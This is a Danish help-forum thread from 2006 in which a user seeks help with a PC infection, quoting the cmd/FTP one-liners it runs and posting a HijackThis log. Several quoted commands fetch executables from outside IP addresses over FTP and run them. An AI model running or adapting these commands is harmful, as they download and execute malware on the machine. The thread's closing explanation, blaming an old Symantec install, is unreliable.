Avatar billede charles17 Nybegynder
23. december 2006 - 18:18 Der er 11 kommentarer og
1 løsning

Loop cmd promt åbner en gang i time

glædelig lillejuleaften

en lille nøddeknækker

ca. en gang i timen åbner mine forældres computer v.h.a kør en command promt :

cmd /c echo OPEN 87.48.64.148 9110>x&echo GET 84785_norton.exe>>x&echo QUIT>>x&FTP -n -s:x&84785_norton.exe&del x&exit

Ipadressen er forskellig hver gang

og henter to filer

x
84785_norton

som den lægger under dokumenter og settings ved den ene bruger (to brugere på comp).

Hvad er dette og hvordan får jeg den til at holde op med det?
(har prøvet antivirus, ad aware og ccleaner)

Med kærlige julehilsner
C
Avatar billede hcma Novice
23. december 2006 - 18:37 #1
Avatar billede hcma Novice
23. december 2006 - 18:38 #2
Avatar billede charles17 Nybegynder
23. december 2006 - 19:26 #3
jeg tror ikke det er den. i regestry er der ingenting der refererer til norton.exe som artiklen foreslår
Avatar billede charles17 Nybegynder
23. december 2006 - 19:57 #4
indenfor den sidste time er den gået amok

cmd.exe /c del i&echo open 83.93.252.227 13153 > i&echo user 1 1 >> i &echo get 076.exe >> i &echo quit >> i &ftp -n -s:i &076.exe&del i&exit


cmd /c echo OPEN 87.48.64.148 9110>x&echo GET 84785_norton.exe>>x&echo QUIT>>x&FTP -n -s:x&84785_norton.exe&del x&exit

cmd /c echo OPEN 70.65.37.192 22313>x&echo GET 84785_norton.exe>>x&echo QUIT>>x&FTP -n -s:x&84785_norton.exe&del x&exit

cmd /c echo OPEN 87.14.56.122 26022>x&echo GET 84785_norton.exe>>x&echo QUIT>>x&FTP -n -s:x&84785_norton.exe&del x&exit

cmd /c echo OPEN 213.138.227.132 32792>x&echo GET 84785_norton.exe>>x&echo QUIT>>x&FTP -n -s:x&84785_norton.exe&del x&exit

/c echo OPEN 82.131.4.96 33011>x&echo GET 84785_norton.exe>>x&echo QUIT>>x&FTP -n

cmd /c echo OPEN 58.227.56.60 3388>x&echo GET 84785_norton.exe>>x&echo QUIT>>x&FTP -n -s:x&84785_norton.exe&del x&exit

alle disse åbner en cmd promt som ftp'er til sites og henter føromtalte filer
den er dum....

C
Avatar billede charles17 Nybegynder
23. december 2006 - 20:03 #5
jeg har prøvet at søge i regdatabase, og slettet alle dem der henviste til ovenstående, nu må vi se om det virker
23. december 2006 - 20:14 #6
Under alle omstændigheder ->
http://www.spywareinfo.dk/index.htm#/manualer/hijackthis.htm
så skal jeg nok følge op ...
Avatar billede charles17 Nybegynder
23. december 2006 - 20:29 #7
Logfile of HijackThis v1.99.1
Scan saved at 20:29:25, on 23-12-2006
Platform: Windows XP SP2 (WinNT 5.01.2600)
MSIE: Internet Explorer v6.00 SP2 (6.00.2900.2180)

Running processes:
C:\WINDOWS\System32\smss.exe
C:\WINDOWS\system32\winlogon.exe
C:\WINDOWS\system32\services.exe
C:\WINDOWS\system32\lsass.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\System32\svchost.exe
C:\WINDOWS\system32\spoolsv.exe
C:\Programmer\AntiVir PersonalEdition Classic\sched.exe
C:\Programmer\AntiVir PersonalEdition Classic\avguard.exe
C:\WINDOWS\system32\inetsrv\temp\services.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\System32\inetsrv\temp\spoolsv.exe
C:\Programmer\RealVNC\VNC4\WinVNC4.exe
C:\WINDOWS\Explorer.EXE
C:\Programmer\Analog Devices\Core\smax4pnp.exe
C:\WINDOWS\system32\hkcmd.exe
C:\Programmer\Java\j2re1.4.2_03\bin\jusched.exe
C:\Programmer\Dell\Media Experience\PCMService.exe
C:\WINDOWS\system32\usbtapnp.exe
C:\Programmer\AntiVir PersonalEdition Classic\avgnt.exe
C:\Programmer\SPAMfighter\SFAgent.exe
C:\WINDOWS\system32\ctfmon.exe
C:\Program Files\Absolute Poker\mainclient.exe
C:\Program Files\Absolute Poker\aphh.exe
C:\WINDOWS\Microsoft.NET\Framework\v2.0.50727\mscorsvw.exe
C:\WINDOWS\system32\wuauclt.exe
C:\WINDOWS\system32\msiexec.exe
C:\WINDOWS\system32\wuauclt.exe
C:\Programmer\Internet Explorer\IEXPLORE.EXE
C:\Documents and Settings\HR\Skrivebord\Hijackthis\alternativ.exe

R1 - HKCU\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = http://www.euro.dell.com/
R0 - HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = http://www.sydbank.dk/privat/
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = http://www.euro.dell.com/
R0 - HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = http://www.euro.dell.com/
R0 - HKCU\Software\Microsoft\Internet Explorer\Toolbar,LinksFolderName = Hyperlinks
O2 - BHO: AcroIEHlprObj Class - {06849E9F-C8D7-4D59-B87D-784B7D6BE0B3} - C:\Programmer\Adobe\Acrobat 6.0\Reader\ActiveX\AcroIEHelper.dll
O4 - HKLM\..\Run: [SoundMAXPnP] C:\Programmer\Analog Devices\Core\smax4pnp.exe
O4 - HKLM\..\Run: [IgfxTray] C:\WINDOWS\system32\igfxtray.exe
O4 - HKLM\..\Run: [HotKeysCmds] C:\WINDOWS\system32\hkcmd.exe
O4 - HKLM\..\Run: [SunJavaUpdateSched] C:\Programmer\Java\j2re1.4.2_03\bin\jusched.exe
O4 - HKLM\..\Run: [PCMService] "C:\Programmer\Dell\Media Experience\PCMService.exe"
O4 - HKLM\..\Run: [USBTA] C:\WINDOWS\system32\usbtapnp.exe
O4 - HKLM\..\Run: [avgnt] "C:\Programmer\AntiVir PersonalEdition Classic\avgnt.exe" /min
O4 - HKLM\..\Run: [SPAMfighter Agent] "C:\Programmer\SPAMfighter\SFAgent.exe" update delay 60
O4 - HKCU\..\Run: [CTFMON.EXE] C:\WINDOWS\system32\ctfmon.exe
O4 - Global Startup: Microsoft Office.lnk = C:\Programmer\Microsoft Office\Office\OSA9.EXE
O9 - Extra button: (no name) - {08B0E5C0-4FCB-11CF-AAA5-00401C608501} - C:\Programmer\Java\j2re1.4.2_03\bin\npjpi142_03.dll
O9 - Extra 'Tools' menuitem: Sun Java Console - {08B0E5C0-4FCB-11CF-AAA5-00401C608501} - C:\Programmer\Java\j2re1.4.2_03\bin\npjpi142_03.dll
O9 - Extra button: Absolute Poker - {EFFF8D47-D060-4108-B761-E8EC86622E56} - C:\Documents and Settings\All Users\Menuen Start\Programmer\Absolute Poker\Absolute Poker.lnk
O9 - Extra 'Tools' menuitem: Absolute Poker - {EFFF8D47-D060-4108-B761-E8EC86622E56} - C:\Documents and Settings\All Users\Menuen Start\Programmer\Absolute Poker\Absolute Poker.lnk
O9 - Extra button: Messenger - {FB5F1910-F110-11d2-BB9E-00C04F795683} - C:\Programmer\Messenger\msmsgs.exe
O9 - Extra 'Tools' menuitem: Windows Messenger - {FB5F1910-F110-11d2-BB9E-00C04F795683} - C:\Programmer\Messenger\msmsgs.exe
O16 - DPF: {01111C00-3E00-11D2-8470-0060089874ED} (Support.com ActionRunner Class) - http://netsupport2.tdconline.dk/sdccommon/download/tgctlar.cab
O16 - DPF: {01111E00-3E00-11D2-8470-0060089874ED} (Support.com SmartIssue) - http://netsupport2.tdconline.dk/sdccommon/download/tgctlsi.cab
O16 - DPF: {17492023-C23A-453E-A040-C7C580BBF700} (Windows Genuine Advantage Validation Tool) - http://go.microsoft.com/fwlink/?linkid=39204
O16 - DPF: {2BC66F54-93A8-11D3-BEB6-00105AA9B6AE} (Symantec AntiVirus scanner) - http://security.symantec.com/sscv6/SharedContent/vc/bin/AvSniff.cab
O16 - DPF: {644E432F-49D3-41A1-8DD5-E099162EEEC5} (Symantec RuFSI Utility Class) - http://security.symantec.com/sscv6/SharedContent/common/bin/cabsa.cab
O16 - DPF: {B38870E4-7ECB-40DA-8C6A-595F0A5519FF} (MsnMessengerSetupDownloadControl Class) - http://messenger.msn.com/download/MsnMessengerSetupDownloader.cab
O16 - DPF: {D216644A-C6DB-49D9-BBCF-D38FE7991BF2} (Util Class) - https://udstedelse.certifikat.tdc.dk/csp/authenticode/tdccsp-0506.exe
O20 - Winlogon Notify: igfxcui - C:\WINDOWS\SYSTEM32\igfxsrvc.dll
O20 - Winlogon Notify: NavLogon - C:\WINDOWS\system32\NavLogon.dll
O20 - Winlogon Notify: WgaLogon - C:\WINDOWS\SYSTEM32\WgaLogon.dll
O23 - Service: AntiVir PersonalEdition Classic Scheduler (AntiVirScheduler) - Avira GmbH - C:\Programmer\AntiVir PersonalEdition Classic\sched.exe
O23 - Service: AntiVir PersonalEdition Classic Guard (AntiVirService) - AVIRA GmbH - C:\Programmer\AntiVir PersonalEdition Classic\avguard.exe
O23 - Service: SoundAP - Unknown owner - C:\WINDOWS\system32\inetsrv\temp\services.exe
O23 - Service: VNC Server Version 4 (WinVNC4) - Unknown owner - C:\Programmer\RealVNC\VNC4\WinVNC4.exe" -service (file missing)
Avatar billede fromsej Praktikant
23. december 2006 - 21:34 #8
Afinstaller RealVNC, det er derigennem du har problemet.
Hent så og installer en nyere version.
Avatar billede charles17 Nybegynder
23. december 2006 - 21:48 #9
Det er den seneste ver. der er installeret i flg. hjemmesiden
Avatar billede fromsej Praktikant
23. december 2006 - 21:53 #10
Klik på Start->Kør skriv Services.msc og klik OK.
Find Tjenesten >> SoundAP << stop den hvis den kører, højreklik på den, klik på Egenskaber og vælg Starttype Deaktiveret.

Genstart i fejlsikret, slet denne mappe:
C:\WINDOWS\system32\inetsrv\temp\

Genstart normalt, se om det hjalp.
Avatar billede charles17 Nybegynder
24. december 2006 - 12:31 #11
desværre det hjalp ikke
Avatar billede charles17 Nybegynder
25. december 2006 - 13:10 #12
har fundet ud af det. det var en gammel inst af symantec der spøgede...
Avatar billede Ny bruger Nybegynder

Din løsning...

Tilladte BB-code-tags: [b]fed[/b] [i]kursiv[/i] [u]understreget[/u] Web- og emailadresser omdannes automatisk til links. Der sættes "nofollow" på alle links.

Loading billede Opret Preview
Kategori
IT-kurser om Microsoft 365, sikkerhed, personlig vækst, udvikling, digital markedsføring, grafisk design, SAP og forretningsanalyse.

Log ind eller opret profil

Hov!

For at kunne deltage på Computerworld Eksperten skal du være logget ind.

Det er heldigvis nemt at oprette en bruger: Det tager to minutter og du kan vælge at bruge enten e-mail, Facebook eller Google som login.

Du kan også logge ind via nedenstående tjenester